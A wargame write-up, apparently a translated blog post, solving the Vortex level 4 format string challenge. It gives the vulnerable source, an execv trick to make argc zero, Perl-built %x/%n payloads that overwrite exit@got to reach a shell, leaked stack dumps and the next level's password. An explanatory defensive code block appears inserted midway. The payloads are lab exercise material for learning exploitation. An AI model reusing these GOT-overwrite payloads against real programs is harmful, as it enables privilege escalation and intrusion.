I only had a rough grasp of FSB (format string bugs) at first, so I read up on it a bit;
http://geundi.tistory.com/124 and
http://proneer.tistory.com/entry/FormatString-%ED%8F%AC%EB%A7%B7%EC%8A%A4%ED%8A%B8%EB%A7%81Format-String-Attack
(both posted under "helpful documents" on my blog)
were a big help.
+) Finally solved it .. WoW
To exec or not to exec
This is the common format string bug, exploit it with care though as a check is made with argc. What is the layout of a process’s memory? How are programs executed?
// -- andrewg, original author was zen-parse :)
#include <stdio.h>   /* for printf; omitted in the original listing */
#include <stdlib.h>
int main(int argc, char **argv)
{
    if(argc) exit(0);        /* the "check made with argc": exits unless argc is 0 */
    printf(argv[3]);         /* format string bug: argv[3] is used directly as the format */
    exit(EXIT_FAILURE);
}
As you can see from the source above, if argc is nonzero it just exits, so to get around that I wrote and ran the following source.
vortex4@melinda:/tmp$ cat test.c
#include <unistd.h>
int main(){
    /* argv == NULL makes the kernel start vortex4 with argc == 0, so the argc check is skipped */
    execv("/vortex/vortex4",(char **)NULL);
    return 0;
}
Writing and running that source gives the output below.
vortex4@melinda:/tmp$ ./te
SSH_CLIENT=221.155.134.193 50713 22vortex4@melinda:/tmp$
What gets printed is the argv[3] slot, and what comes out there is an environment variable. I checked it:
vortex4@melinda:/tmp$ env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=221.155.134.193 50713 22
SSH_TTY=/dev/pts/19
LC_ALL=C
USER=vortex4
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
TMOUT=1800
MAIL=/var/mail/vortex4
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/tmp
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/vortex4
LOGNAME=vortex4
SSH_CONNECTION=221.155.134.193 50713 178.79.134.250 22
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
OLDPWD=/tmp/test
_=/usr/bin/env
So now the target, i.e. what we need to change, is decided.
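To make the argc trick concrete from the defender's side, here is an added example (my code, not the challenge's or this post's): a constructed model of the argv/envp layout after execv(path, NULL), the original guard next to a hardened one, and a small checker that flags printf directives in untrusted input. The array contents and all function names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
/* Constructed model of the start-up layout the post ran into: the argv pointer
   array is followed by its NULL terminator and then envp. After execv(path, NULL)
   argc is 0, so argv[0] is already that terminator and argv[3] is envp[2], the
   third variable in the env listing above (SSH_CLIENT). Values are constructed. */
static char *empty_argv_stack[] = {
    NULL,                                  /* argv[0]: terminator, argc == 0 */
    "TERM=xterm",                          /* envp[0] == argv[1] */
    "SHELL=/bin/bash",                     /* envp[1] == argv[2] */
    "SSH_CLIENT=221.155.134.193 50713 22", /* envp[2] == argv[3] */
    NULL,
};
/* The challenge's guard, for comparison: it exits only when argc != 0, so an empty
   argv slips past. Returns 1 when execution would reach printf(argv[3]). */
int original_guard_lets_through(int argc) { return argc == 0; }

/* Hardened version: check the argument really exists, then pass it only as a "%s"
   argument, never as the format. Returns bytes written, or -1 if argv[3] is absent. */
int print_arg3_safely(int argc, char **argv, char *out, size_t outlen) {
    if (argc < 4 || argv == NULL || argv[3] == NULL) return -1;
    return snprintf(out, outlen, "%s", argv[3]);
}

/* Code-review / detection helper: counts printf conversions in untrusted data and
   flags "%n", the directive that turns a format bug into a memory write. */
int count_conversions(const char *s, int *has_n) {
    int n = 0;
    *has_n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }                    /* "%%" is a literal */
        n++;
        const char *p = s + 1;
        while (*p && strchr("0123456789.-+ #lhjzt", *p)) p++;  /* flags, width, length */
        if (*p == 'n') *has_n = 1;
    }
    return n;
}

int main(void) {
    char buf[128];
    int has_n, n = count_conversions("AAAA%8x%57366x%n", &has_n);
    printf("argc==0 passes original guard: %d; argv[3] is \"%s\"\n",
           original_guard_lets_through(0), empty_argv_stack[3]);
    printf("hardened guard with argc==0: %d\n", print_arg3_safely(0, empty_argv_stack, buf, sizeof buf));
    printf("conversions in the payload-style string: %d, contains %%n: %d\n", n, has_n);
    return 0;
}
```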
export SSH_CLIENT=`perl -e 'print "\xaa\xbb\xcc\xddAAAA\xdd\xcc\xbb\xaaBBBBBBBBBBBBBBBBBBB","%8x"x126,"%00030x","%x","%00030x","%x"'`
vortex4@melinda:/tmp$ ./te
SSH_CLIENT=せ炅AAAA汾빽BBBBBBBBBBBBBBBBBBB 0 8048459f7fcaff4 8048450 0 0f7e404b3 0ffffd664ffffd668f7fcf000 0ffffd61cffffd668 0 804822cf7fcaff4 0 0 0705936ec47fa72fc 0 0 0 0 8048360 0f7ff0a90f7e403c9f7ffcff4 0 8048360 0 8048381 8048414 0ffffd664 8048450 80484c0f7feb660ffffd65cf7ffd918 0 0ffffd782ffffd78dffffd79dffffd954ffffd969ffffd97dffffd986ffffd993ffffdeb4ffffdebfffffded6ffffdf23ffffdf2cffffdf3dffffdf45ffffdf58ffffdf68ffffdf9fffffdfbfffffdfe1 0 20f7fdb9c0 21f7fdb000 101f898b75 6 1000 11 64 3 8048034 4 20 5 9 7f7fdc000 8 0 9 8048360 b 138c c 138d d 138c e 138c 17 1 19ffffd76b 1fffffdfe8 fffffd77b 0 0 0 0 0440000004bab58db7a89c7f942f23dd16955f9bf 36383645540000783d4d526d726574454853002f3d4c4c2f6e69626873616248535300494c435f3d544e45ddccbbaa000000000000000000000041414141aabbccdd00000000000000000000004242424242424242vortex4@melinda
vortex4@melinda:/tmp$
For those who don't quite follow, here is a kindly explanation as a jpg image.
+) You'll get there by tuning A and B against each other -_- ; I recommend getting A roughly right and then keep increasing B.
esp : 0xffffe430
e430 : 58416
ffff - e430 : 7119
export SSH_CLIENT=`perl -e 'print "\x08\xa0\x04\x08(exit@got)AAAA\x0a\xa0\x04(exit@got+4)\x08BBBBBBBBBBBBBBBBBBB","%8x"x126,"%57366x","%n","%07119x","%n"'`
The /bin/sh address is too large to fit into a single write, so it has to be split across two writes at the exit@got address, which I have marked in the payload.
Also, if you look at the payload, it says 57366 instead of 58416; the reason is that the length of the payload has to be subtracted, and the 11 at the front stands for SSH_CLIENT (the "SSH_CLIENT=" prefix).
11 + 4 + 4 + 4 + 19 + 1008 = 1050
Running it: $ cat /etc/vortex_pass/vortex5
:4VtbC4lr
+) So moved ㅠ ㅁ ㅠ